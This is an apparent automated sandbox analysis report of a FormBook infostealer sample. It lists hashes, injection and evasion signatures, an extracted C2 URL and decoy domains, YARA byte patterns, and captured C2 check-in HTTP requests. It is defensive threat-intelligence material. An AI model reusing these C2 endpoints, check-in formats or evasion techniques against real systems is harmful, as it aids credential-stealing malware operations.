
Analysis Report RCS76393.exe

Overview

General Information

Sample Name: RCS76393.exe
Analysis ID: 383936
MD5: 1ab1c3129fa0764ea0702da70f3ef569
SHA1: ee8cd1946b58390f4599056df1472d01cf85a543
SHA256: 5d1870672eff4e2ec6d699d654d5268051f7a56f8ca991fefa538eeef380a89c
Tags: Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • RCS76393.exe (PID: 6500 cmdline: 'C:\Users\user\Desktop\RCS76393.exe' MD5: 1AB1C3129FA0764EA0702DA70F3EF569)
    • RCS76393.exe (PID: 6544 cmdline: 'C:\Users\user\Desktop\RCS76393.exe' MD5: 1AB1C3129FA0764EA0702DA70F3EF569)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msiexec.exe (PID: 6760 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
          • cmd.exe (PID: 6848 cmdline: /c del 'C:\Users\user\Desktop\RCS76393.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.batiktintaemas.com/goei/"], "decoy": ["bet365o2.com", "gulf-landlord.info", "foodsystemsjusticeproject.com", "ronwongart.com", "fwgkdhg.icu", "armanrugservice.com", "mapadequito.com", "vbkulkarni.com", "ltsbinge.com", "creativem2.com", "mindflexlab.com", "ushealthvisa.com", "247carkeyslondon.com", "addthat.xyz", "zanzan8.com", "legendsalliance.net", "shopflyonline.com", "csgo-roll.net", "reutbergcapital.com", "mediaworkhouse.com", "office-tourism-tirana.com", "evecrude.xyz", "sportwillwin.com", "cluskmusk.com", "her2mymeme.com", "rsw3313.com", "digitalmarketingmoves.com", "seaworldminecraft.com", "onlinecollegetherapy.com", "ourmonaca.com", "generalflix.com", "limonproduce.com", "casalomasymphonyorchestra.com", "karyapertama.com", "massaponaxhighschool.com", "covidtracksb.com", "breathharbour.net", "italianrealestateagents.com", "xn--ga-c9a.com", "libreo.club", "leverhump.store", "kevinrsamuels.network", "pimpmyrecipe.com", "win-back.online", "kelasipo.com", "caross-china.com", "ly-iot.com", "nolimitsynthetics.net", "epicfriend.club", "19come.com", "lcjzjt.com", "lxpvccard.com", "distributorfocuson.com", "looneytunesrun.com", "mariebiernacki.com", "maquinaclub.com", "randalldavisauthor.com", "niggeruprising.com", "theexpatweightcoach.com", "mex33.info", "imbravura.com", "baldosasanjose.com", "akindousa.com", "ourmunera.net"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166b9:$sqlite3step: 68 34 1C 7B E1
  • 0x167cc:$sqlite3step: 68 34 1C 7B E1
  • 0x166e8:$sqlite3text: 68 38 2A 90 C5
  • 0x1680d:$sqlite3text: 68 38 2A 90 C5
  • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
3.1.RCS76393.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.1.RCS76393.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.1.RCS76393.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x158b9:$sqlite3step: 68 34 1C 7B E1
  • 0x159cc:$sqlite3step: 68 34 1C 7B E1
  • 0x158e8:$sqlite3text: 68 38 2A 90 C5
  • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
  • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
3.2.RCS76393.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.2.RCS76393.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Antivirus detection for URL or domain
Source: www.batiktintaemas.com/goei/ | Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp | Malware Configuration Extractor: FormBook (same C2 list and decoy list as given under Malware Configuration above)
Yara detected FormBook
Source: Yara match | File source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 3.1.RCS76393.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RCS76393.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.1.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: RCS76393.exe | Joe Sandbox ML: detected
Source: 3.1.RCS76393.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.2.RCS76393.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: RCS76393.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Binary string: msiexec.pdb | source: RCS76393.exe, 00000003.00000002.363009374.0000000000D80000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000005.00000000.348166321.000000000DC20000.00000002.00000001.sdmp
Source: Binary string: msiexec.pdbGCTL | source: RCS76393.exe, 00000003.00000002.363009374.0000000000D80000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: RCS76393.exe, 00000003.00000002.362641926.0000000000AEF000.00000040.00000001.sdmp, msiexec.exe, 00000007.00000002.588142042.0000000004560000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: RCS76393.exe, msiexec.exe
Source: Binary string: wscui.pdb | source: explorer.exe, 00000005.00000000.348166321.000000000DC20000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\RCS76393.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\RCS76393.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then pop edi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49741 -> 198.185.159.144:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49741 -> 198.185.159.144:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49741 -> 198.185.159.144:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.batiktintaemas.com/goei/
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe | DNS query: www.addthat.xyz
Source: C:\Windows\explorer.exe | DNS query: www.evecrude.xyz
Source: global traffic | HTTP traffic detected: GET /goei/?EzuXh6BP=B46qr3zTyBR1t+VKbrees7UR/FiD4WL3nz1lGh06nIBkEBDQrNA0bRgDDyF1Au9+nA9wWbL6eg==&RL0=rVvxj02xpd_lyz HTTP/1.1 | Host: www.ly-iot.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /goei/?EzuXh6BP=GY2gQUF0Rr/aPbkdLLDyshZLrmGphrTrFvzfodUnQAaoW3qjeuccMn3ranK+t6GyiOOsZqKqHA==&RL0=rVvxj02xpd_lyz HTTP/1.1 | Host: www.ronwongart.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /goei/?EzuXh6BP=TTuxDc9EejbduYk8ZHEjlKcpN/O2EpBILXUKac8y6lhY4fajDGEqKXEgdN9L03N9MJzUHOy50w==&RL0=rVvxj02xpd_lyz HTTP/1.1 | Host: www.pimpmyrecipe.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /goei/?EzuXh6BP=BdWs9+XwUamw8CUuz3E8yrboev7iCL3gb6z7OkS86X4CeTXY3ejv3dXKop2WOnP3DDbLLyGv2A==&RL0=rVvxj02xpd_lyz HTTP/1.1 | Host: www.foodsystemsjusticeproject.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /goei/?EzuXh6BP=iESvN3vx+46BgVwWtoPvPQmUnTMTtp1hHS9L6erIUoS4dJlpb0oL7GpX49j9BG002Zkja/L0IA==&RL0=rVvxj02xpd_lyz HTTP/1.1 | Host: www.batiktintaemas.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /goei/?EzuXh6BP=WHzdRAWCNmljEZUdYknMeV5zI3m+uLt35kXWxc+UN/aPGTi9DTFvtLFMQ5OC8xESdqE/mkifJw==&RL0=rVvxj02xpd_lyz HTTP/1.1 | Host: www.addthat.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /goei/?EzuXh6BP=1hbvBZ6scGrlPy0N1riO1jCdFmqX21DbBNOeXEZPJTZAL1bLTprMXMNvQ4/+FZIG6w0HvwIWjw==&RL0=rVvxj02xpd_lyz HTTP/1.1 | Host: www.evecrude.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 199.59.242.153
Source: Joe Sandbox View | ASN Name: IOFLOODUS
Source: Joe Sandbox View | ASN Name: MISSDOMAINSE
Source: Joe Sandbox View | ASN Name: BODIS-NJUS
Source: unknown | DNS traffic detected: queries for: www.ly-iot.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Server: Microsoft-IIS/10.0 | X-Powered-By: ASP.NET | Date: Thu, 08 Apr 2021 10:47:16 GMT | Connection: close | Content-Length: 1245
Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.329599785.000000000095C000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 3.1.RCS76393.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RCS76393.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.1.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 3.1.RCS76393.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.1.RCS76393.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 3.2.RCS76393.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.RCS76393.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 3.1.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.1.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 3.2.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\RCS76393.exe | Code function: 3_2_004181C0 NtCreateFile,
Source: C:\Users\user\Desktop\RCS76393.exe | Code function: 3_2_00418270 NtReadFile,
Source: C:\Users\user\Desktop\RCS76393.exe | Code function: 3_2_004182F0 NtClose,
Source: C:\Users\user\Desktop\RCS76393.exe | Code function: 3_2_004183A0 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\RCS76393.exe | Code function: 3_2_0041826B NtReadFile,
Source: C:\Users\user\Desktop\RCS76393.exe | Code function: 3_2_0041839A NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\RCS76393.exe | Code function: 3_2_00A398F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\RCS76393.exe | Code function: 3_2_00A39860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\RCS76393.exe | Code function: 3_2_00A39840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\RCS76393.exe | Code function: 3_2_00A399A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\RCS76393.exe | Code function: 3_2_00A39910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\RCS76393.exe | Code function: 3_2_00A39A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\RCS76393.exe | Code function: 3_2_00A39A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\RCS76393.exe | Code function: 3_2_00A39A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A395D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A396E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A397A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A398A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A3B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A399D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39A10 NtQuerySection,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A3A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A395F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A3AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39560 NtWriteFile,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A396D0 NtCreateKey,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39670 NtQueryInformationProcess,
